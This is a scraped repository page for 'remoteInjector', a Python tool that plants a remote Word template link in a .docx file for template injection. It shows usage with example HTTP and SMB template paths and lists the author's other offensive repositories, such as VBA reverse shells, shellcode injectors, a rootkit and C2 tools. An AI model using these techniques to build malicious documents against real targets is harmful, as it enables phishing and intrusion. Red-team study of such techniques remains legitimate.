• Stars
    star
    135
  • Rank 259,549 (Top 6 %)
  • Language
    Python
  • Created over 4 years ago
  • Updated about 3 years ago

Reviews

There are no reviews yet. Be the first to send feedback to the community and the maintainers!

Repository Details

Inject remote template link into word document for remote template injection

remoteInjector

Injects link to remote word template into word document.

Related Blog Post

Requirements

  • Python3.x or Python2.x

Usage

usage: remoteinjector.py [-h] [-w URL] F

Inject Template Through Relationship Settings

positional arguments:
  F           .docx file to inject template into

optional arguments:
  -h, --help  show this help message and exit
  -w URL      remote url to template

Example of use
To inject remote http url:

remoteinjector.py -w https://example.com/template.dotm example.docx

To inject SMB path:

remoteinjector.py -w \\1.1.1.1\C$\TEMP\template.dotm example.docx

More Repositories

1

VBA-Macro-Projects

This repository is a collection of my malicious VBA projects.
VBA
109
star
2

VBA-Macro-Reverse-Shell

Fully functioning reverse shell written entirely in VBA.
VBA
102
star
3

stealthInjector

Injects shellcode into remote processes using direct syscalls
C++
75
star
4

FES

Fast Endpoint Scanner
Rust
49
star
5

VBA-Macro-Dump-Process

Process Dumper written entirely in VBA.
VBA
21
star
6

Linux-Rootkit

A Linux based rootkit designed with advanced kernel-level evasion techniques. This is the Senior Project repository for John Woodman, Owen Flannagan, and Brandon Stacy.
C++
6
star
7

blog

My Security Blog
HTML
3
star
8

macro-test

3
star
9

Template-Injection

Test server that will serve word document macro templates.
3
star
10

C2AllTheThings

List of all C2 communication methods, ranging from common (HTTP) to just weird (Spotify), including PoC code
3
star
11

SpotifyC2

Command and Control using Spotify acrostics and descriptions
Python
2
star
12

WADLParser

This script will parse a given application.wadl file and print out the endpoints to be used for bruteforcing or other bug bounty related endeavors.
JavaScript
2
star
13

testingScapy

This is a test repository for trying out scapy scripts
Python
2
star
14

megParser

A quick script to parse Tomnomnom's meg scanner.
Shell
2
star
15

SecureMe

A basic Linux securing tool for enthusiasts trying to quickly and easily secure their systems.
Python
2
star
16

SHellNo

This is the preliminary work for the SHellNo C2 framework
C++
2
star
17

HackerTwitter

Simple UI design for Twitter inspired by ycombinator's Hacker News
Python
1
star
18

newGitTest

1
star